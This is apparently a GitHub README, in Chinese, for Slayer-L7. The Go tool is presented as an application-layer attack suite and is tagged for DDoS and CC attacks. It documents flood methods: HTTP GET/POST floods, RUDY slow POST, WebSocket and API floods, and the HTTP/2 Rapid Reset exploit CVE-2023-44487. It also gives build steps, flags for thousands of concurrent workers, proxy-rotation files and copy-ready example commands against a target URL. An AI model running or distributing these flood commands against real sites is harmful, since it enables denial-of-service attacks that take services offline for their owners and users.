Syn2Much/Slayer-L7

GitHub: Syn2Much/Slayer-L7

Slayer-L7 是一个用 Go 编写的高性能应用层压力测试工具,支持多种 HTTP/S 流量模拟方法和大规模并发。

Stars: 25 | Forks: 6

# ⚔️ Slayer 7 - 应用层攻击套件 ## 方法 | 方法 | 描述 | | ------------ | ------------------------------------------------------------ | | `httpget` | 标准 HTTP GET 泛洪 | | `httppost` | 带有随机 form / JSON payload 的 HTTP POST | | `rudy` | 慢速 POST — 巨大的 `Content-Length`,缓慢发送字节 | | `apiflood` | 带有随机 endpoint 和嵌套 payload 的 JSON API 泛洪 | | `rapidreset` | HTTP/2 Rapid Reset (CVE-2023-44487) | | `wsflood` | 带有混合流量的 WebSocket 连接泛洪 | ## 安装说明 ### 前置条件 * **Go 1.21+** ### 快速设置 ``` git clone https://github.com/Syn2Much/Slayer-L7.git cd Slayer-L7 go mod tidy go build -o slayer . ``` ## 用法 ``` slayer -t [-m method] [-w workers] [-d duration] [-p proxyfile] [-v] [-r ms] ``` ### Flags | Flag | 默认值 | 描述 | | ---- | ------------ | --------------------------------------- | | `-t` | *(必填)* | 目标 URL (例如 `https://example.com`) | | `-m` | `httpget` | 攻击方法 | | `-w` | `2048` | 并发 worker 数量 | | `-d` | `30` | 持续时间(秒) | | `-p` | *(无)* | Proxy 文件路径(省略以使用直连模式) | | `-v` | `false` | 将请求错误打印到 stderr | | `-r` | `0` | 每个 worker 请求之间的延迟(毫秒)(0 = 无限) | ### 依赖 ``` github.com/gorilla/websocket golang.org/x/net/http2 golang.org/x/net/http2/hpack ``` ## 示例 ``` # 基础 GET flood (60秒) ./slayer -t https://target.com -m httpget -d 60 # 通过 proxies 进行 POST flood (4096 个 workers) ./slayer -t https://target.com -m httppost -w 4096 -d 120 -p proxies.txt # RUDY 慢速 POST ./slayer -t https://target.com -m rudy -w 500 -d 300 # 通过 proxies 进行 HTTP/2 Rapid Reset ./slayer -t https://target.com -m rapidreset -w 1024 -p proxies.txt # WebSocket flood ./slayer -t https://target.com -m wsflood -w 2048 -d 60 # API JSON flood ./slayer -t https://target.com -m apiflood -w 2048 -d 90 # 速率受限的 GET flood (跨 10 个 workers 最大约 100 RPS) ./slayer -t https://target.com -m httpget -w 10 -d 60 -r 100 # Verbose 模式 — 运行时将错误打印到 stderr ./slayer -t https://target.com -m httpget -d 30 -v ``` ## Proxy 文件格式 每行一个 proxy。 支持带有可选身份验证的 HTTP / HTTPS / SOCKS5。 ``` http://proxy1.example.com:8080 http://user:pass@proxy2.example.com:3128 socks5://proxy3.example.com:1080 ``` ## 👤 作者 **Syn2Much** [![Email](https://img.shields.io/badge/Email-hell%40sinnners.city-red?style=flat-square&logo=gmail)](mailto:hell@sinnners.city) [![X](https://img.shields.io/badge/@synacket-black?style=flat-square&logo=x)](https://x.com/synacket)
标签:CC攻击, DDoS攻击, EVTX分析, Golang, 安全编程, 应用层攻击, 日志审计, 网络压测, 配置错误